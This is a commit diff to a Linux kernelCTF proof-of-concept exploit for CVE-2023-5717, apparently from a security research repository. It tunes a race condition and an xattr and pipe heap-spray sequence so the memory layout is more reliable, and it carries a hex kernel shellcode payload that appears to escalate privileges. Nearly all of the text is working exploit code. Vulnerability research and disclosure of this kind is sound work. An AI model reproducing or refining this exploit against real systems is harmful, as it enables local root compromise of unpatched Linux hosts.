making more reliable memory layout?

Author: msh1307

pocs/linux/kernelctf/CVE-2023-5717_mitigation/exploit/mitigation-v3b-6.1.55/exploit

@@ -38,7 +38,7 @@
 #define CPU_A 1 // main cpu
 #define CPU_B 0
 #define MAX_TRY 4096
-#define TRY_PER_ITER 1024
+#define TRY_PER_ITER 300
 // TOTAL_ITER = MAX_TRY * TRY_PER_ITER
 
 char shellcode[] = "\x0f\x01\xf8\x65\x4c\x8b\x24\x25\xc0\x0c\x02\x00\x4d\x8b\xb4\x24\x48\x02\x00\x00\x49\x81\xee\x30\xc0\x1e\x00\x4d\x89\xf0\x48\xc7\xc7\x01\x00\x00\x00\x4c\x89\xc0\x48\x05\x50\xde\x1b\x00\x41\x54\x41\x50\xff\xd0\x48\x89\xc3\x41\x58\x41\x5c\x4c\x89\xc0\x48\x05\x00\x69\xa7\x02\x48\x89\xc7\x48\x89\xbb\x38\x08\x00\x00\x49\x89\xbc\x24\x38\x08\x00\x00\x4c\x89\xc0\x48\x05\x40\x6b\xa7\x02\x48\x89\xc7\x49\x89\xbc\x24\xd8\x07\x00\x00\x0f\x01\xf8\x48\xcf";
@@ -289,7 +289,7 @@ void print_proc_self_maps_raw() {
 }
 
 int counter_init = 0;
-void race(int group_leader, int timer) { // caller must have ownership of the group
+void race(int group_leader, int init) { // caller must have ownership of the group
     int pipefd[2];
     uint64_t buf[0x2000] = {0, };
     char buffer[0x100] = {0x41, };
@@ -299,6 +299,22 @@ void race(int group_leader, int timer) { // caller must have ownership of the gr
     }
     int ppid = getppid();
     int status;
+    if (init) {  // Will this help in forming a reliable memory layout?
+        spray_xattr_page(0x3008, 12, 1); // 12296
+        spray_xattr_page(0x4008, 2, 1); // 16392
+        remove_xattr("security.x16392_0", 1);
+        remove_xattr("security.x16392_1", 1);
+        remove_xattr("security.x12296_5", 1);
+        remove_xattr("security.x12296_6", 1);
+        remove_xattr("security.x12296_11", 1);
+        resize_pipe(vuln_pipe[1], 0x1000 * 220);
+        remove_xattr("security.x12296_10", 1);
+        remove_xattr("security.x12296_7", 1); 
+        if (setxattr("/tmp/x1", "security.x12296_10", buf, 0x3008, 0) < 0) {
+            perror("reclaim failed");
+            exit(EXIT_FAILURE);
+        }
+    }
     if (setxattr("/tmp/x1", "security.ssiphim", buf, 0x3008, 0) < 0) {
         perror("reclaim failed");
         exit(EXIT_FAILURE);
@@ -470,27 +486,12 @@ pid_t add_siblings_fork(int group_leader, int cnt, int ctx_pid, int is_racer){
             sched_yield();
             // Minimizing heap noise. 
             // child will be running on CPU_A
-            spray_xattr_page(0x3008, 12, 1); // 12296
-            spray_xattr_page(0x4008, 2, 1); // 16392
-            remove_xattr("security.x16392_0", 1);
-            remove_xattr("security.x16392_1", 1);
-            remove_xattr("security.x12296_5", 1);
-            remove_xattr("security.x12296_6", 1);
-            sched_yield();
-            // this reclaim process must be atomic
-            remove_xattr("security.x12296_11", 1);
-            resize_pipe(vuln_pipe[1], 0x1000 * 220);
-            remove_xattr("security.x12296_10", 1);
-            remove_xattr("security.x12296_7", 1); 
-            if (setxattr("/tmp/x1", "security.x12296_10", buf, 0x3008, 0) < 0) {
-                perror("reclaim failed");
-                exit(EXIT_FAILURE);
-            }
-
             for (int _; _<TRY_PER_ITER; _++) {
                 while (!atomic_load(&race_go));
-                race(group_leader, MIN + _*50);
-
+                if (_ == 0)
+                    race(group_leader, 1);
+                else 
+                    race(group_leader, 0);
             }
         }
         sleep(9999999);
@@ -717,7 +718,7 @@ int main(void) {
     race_oracle();
     tfd = timerfd_create(CLOCK_MONOTONIC, 0);
 	do_epoll_enqueue(tfd);
-    alarm(60*30);
+    alarm(900);
     spray_xattr_page(0x3000, 2048, 0);
 
     exploit();